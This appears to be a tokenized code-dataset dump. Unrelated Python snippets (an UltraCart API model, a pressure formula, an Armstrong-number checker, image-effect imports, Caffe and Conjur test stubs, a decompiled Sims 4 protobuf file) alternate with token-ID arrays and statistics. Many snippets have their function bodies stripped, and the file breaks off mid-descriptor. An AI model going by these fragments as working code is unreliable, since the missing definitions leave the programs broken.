# coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 # noqa: E501 OpenAPI spec version: 2.0.0 Contact: support@ultracart.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ApplyLibraryItemResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 37811, 198, 220, 220, 220, 14563, 43476, 8324, 7824, 569, 17, 628, 220, 220, 220, 14563, 43476, 30617, 7824, 10628, 362, 220, 1303, 645, 20402, 25, 412, 33548, 628, 220, 220, 220, 4946, 1761...
2.52381
336
np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth* height/(gas_constant*standard_temperature))
[ 37659, 62, 8439, 942, 62, 71, 28875, 1635, 10688, 13, 11201, 32590, 70, 4108, 270, 62, 4134, 1635, 285, 6192, 62, 22208, 62, 16442, 9, 6001, 29006, 22649, 62, 9979, 415, 9, 20307, 62, 11498, 21069, 4008 ]
2.783784
37
from pytest import mark # if setup.py present, code could be installed as library # so that there's no need include path # pip install -e . from pytest_resources import do_lower_case # from src.for_testing import do_lower_case
[ 6738, 12972, 9288, 1330, 1317, 198, 198, 2, 611, 9058, 13, 9078, 1944, 11, 2438, 714, 307, 6589, 355, 5888, 198, 2, 523, 326, 612, 338, 645, 761, 2291, 3108, 198, 2, 7347, 2721, 532, 68, 764, 198, 6738, 12972, 9288, 62, 37540, 133...
3.578125
64
import re import os # copy required files # change actions.c to add flow_radar lock # change p4_pd_rpc_server.ipp if __name__ == "__main__": copy_files() change_actions_c() change_p4_pd_rpc_server_ipp() change_p4_pd_rpc_thrift()
[ 11748, 302, 198, 11748, 28686, 198, 198, 2, 4866, 2672, 3696, 198, 198, 2, 1487, 4028, 13, 66, 284, 751, 5202, 62, 6335, 283, 5793, 198, 198, 2, 1487, 279, 19, 62, 30094, 62, 81, 14751, 62, 15388, 13, 3974, 198, 198, 361, 11593, ...
2.418367
98
#!/usr/bin/python3 # -*- coding: utf-8 -*- # calculation tool for a bridge circuit with two input current sources # two current sources can supply from both of top of the bridge and middle of the bridge # define the voltage name as follows: # Vp: voltage at the top of the bridge # Vn: voltage at the middle of the bridge if __name__ == '__main__': main()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 2, 17952, 2891, 329, 257, 7696, 10349, 351, 734, 5128, 1459, 4237, 198, 2, 734, 1459, 4237, 460, 5127, 422, 1111, ...
3.392523
107
#Program to check whether the number is an armstrong number or not #Ask user to enter the number number=int(input("Enter the number you want to check armstrong: ")) #To calculate the length of number entered. order=len(str(number)) #Initialise sum to 0 sum=0 temp=number while temp>0: num=temp%10 sum+=num**order temp//=10 if (number==sum): print("The number you have entered is an Armstrong number.") else: print("The number you have entered is not an Armstrong number.") #OUTPUT: #Enter the number you want to check armstrong: 1634 #The number you have entered is an Armstrong number.
[ 2, 15167, 284, 2198, 1771, 262, 1271, 318, 281, 3211, 11576, 1271, 393, 407, 198, 2, 25214, 2836, 284, 3802, 262, 1271, 198, 17618, 28, 600, 7, 15414, 7203, 17469, 262, 1271, 345, 765, 284, 2198, 3211, 11576, 25, 220, 366, 4008, 198...
3.21875
192
from pyexlatex.models.sizes.textwidth import TextWidth from pyexlatex.models.format.rule import Rule
[ 6738, 12972, 1069, 17660, 87, 13, 27530, 13, 82, 4340, 13, 5239, 10394, 1330, 8255, 30916, 198, 6738, 12972, 1069, 17660, 87, 13, 27530, 13, 18982, 13, 25135, 1330, 14330, 628 ]
3.290323
31
from math import sqrt import asks import datetime import numpy as np import random from PIL import Image from PIL.ImageDraw import Draw from PIL.ImageEnhance import Brightness from PIL.ImageFont import truetype from curio import spawn_thread from curious.commands import Context, Plugin, command from io import BytesIO from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image SCANLINES, NOISE, BOTH = range(3)
[ 6738, 10688, 1330, 19862, 17034, 198, 198, 11748, 7893, 198, 11748, 4818, 8079, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 4738, 198, 6738, 350, 4146, 1330, 7412, 198, 6738, 350, 4146, 13, 5159, 25302, 1330, 15315, 198, 6738, 350, ...
3.284672
137
import logging from maskgen import video_tools import random import maskgen.video_tools import os import maskgen import json plugin = "DonorPicker"
[ 11748, 18931, 198, 6738, 9335, 5235, 1330, 2008, 62, 31391, 198, 11748, 4738, 198, 11748, 9335, 5235, 13, 15588, 62, 31391, 198, 11748, 28686, 198, 11748, 9335, 5235, 198, 11748, 33918, 198, 198, 33803, 796, 366, 3987, 273, 47, 15799, 1...
3.609756
41
import caffe import numpy as np import os import sys import track_model_train as track_model import train_config max_iter = 1000 if __name__ == '__main__': config = train_config.Config() eval_avg_scores(config)
[ 11748, 21121, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28686, 198, 11748, 25064, 198, 198, 11748, 2610, 62, 19849, 62, 27432, 355, 2610, 62, 19849, 198, 11748, 4512, 62, 11250, 198, 198, 9806, 62, 2676, 796, 8576, 198, 361, 11593...
2.907895
76
# # Copyright (C) 2014 Conjur Inc # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from mock import patch import conjur api = conjur.new_from_key('foo', 'bar') group = api.group('v1/admins')
[ 2, 198, 2, 15069, 357, 34, 8, 1946, 37587, 333, 3457, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 286, 198, 2, 428, 3788, 290, 3917, 10314, 3696, 357, 1169, 366, 25423, ...
3.701538
325
# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py # Compiled at: 2020-12-13 14:24:09 # Size of source mod 2**32: 103336 bytes from google.protobuf import descriptor from google.protobuf import message from google.protobuf import reflection from google.protobuf import descriptor_pb2 import protocolbuffers.Consts_pb2 as Consts_pb2 import protocolbuffers.Chat_pb2 as Chat_pb2 import protocolbuffers.S4Common_pb2 as S4Common_pb2 import protocolbuffers.Localization_pb2 as Localization_pb2 import protocolbuffers.Exchange_pb2 as Exchange_pb2 DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto', package='EA.Sims4.Network', serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1a\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b \x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n \x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 \x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 \x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! \x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 \x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n') _SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType', full_name='EA.Sims4.Network.SocialFeedItemType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED', index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED', index=2, number=2, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED', index=3, number=3, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED', index=4, number=4, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED', index=5, number=5, options=None, type=None), descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS', index=6, number=6, options=None, type=None)], containing_type=None, options=None, serialized_start=6663, serialized_end=6853) _SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType', full_name='EA.Sims4.Network.SocialClusterMessageType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor(name='SOC_LOGIN', index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_LOGOFF', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE', index=2, number=2, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE', index=3, number=3, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB', index=4, number=4, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB', index=5, number=5, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP', index=6, number=6, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED', index=7, number=8, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE', index=8, number=9, options=None, type=None), descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER', index=9, number=10, options=None, type=None)], containing_type=None, options=None, serialized_start=6856, serialized_end=7118) SFI_ITEM_DOWNLOADED = 0 SFI_ITEM_UPLOADED = 1 SFI_ITEM_FAVORITED = 2 SFI_ITEM_COMMENTED = 3 SFI_ITEM_SHOWCASED = 4 SFI_PROFILE_COMMENTED = 5 SFI_NEW_FOLLOWERS = 6 SOC_LOGIN = 0 SOC_LOGOFF = 1 SOC_PRESENCEUPDATE = 2 SOC_FEEDUPDATE = 3 SOC_ADD_FEEDSUB = 4 SOC_REMOVE_FEEDSUB = 5 SOC_BROADCAST_PRIVOP = 6 SOC_BROADCAST_QUEUED = 8 SOC_BROADCAST_CACHE_INVALIDATE = 9 SOC_REST_USER_REGISTER = 10 _SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg', full_name='EA.Sims4.Network.SocialFriendMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='simId', full_name='EA.Sims4.Network.SocialFriendMsg.simId', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='note', full_name='EA.Sims4.Network.SocialFriendMsg.note', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='prefix', full_name='EA.Sims4.Network.SocialFriendMsg.prefix', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='persona', full_name='EA.Sims4.Network.SocialFriendMsg.persona', index=4, number=5, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='cheatForce', full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=112, serialized_end=230) _SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg', full_name='EA.Sims4.Network.SocialPersonaResponseMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='personas', full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas', index=0, number=1, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=232, serialized_end=276) _SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse', full_name='EA.Sims4.Network.SocialGenericResponse', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='error', full_name='EA.Sims4.Network.SocialGenericResponse.error', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='msg_type', full_name='EA.Sims4.Network.SocialGenericResponse.msg_type', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postId', full_name='EA.Sims4.Network.SocialGenericResponse.postId', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postParentId', full_name='EA.Sims4.Network.SocialGenericResponse.postParentId', index=3, number=4, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=278, serialized_end=405) _SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='AccountName', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='AccountNotes', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='presence', full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence', index=2, number=3, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='OnlineStatus2', 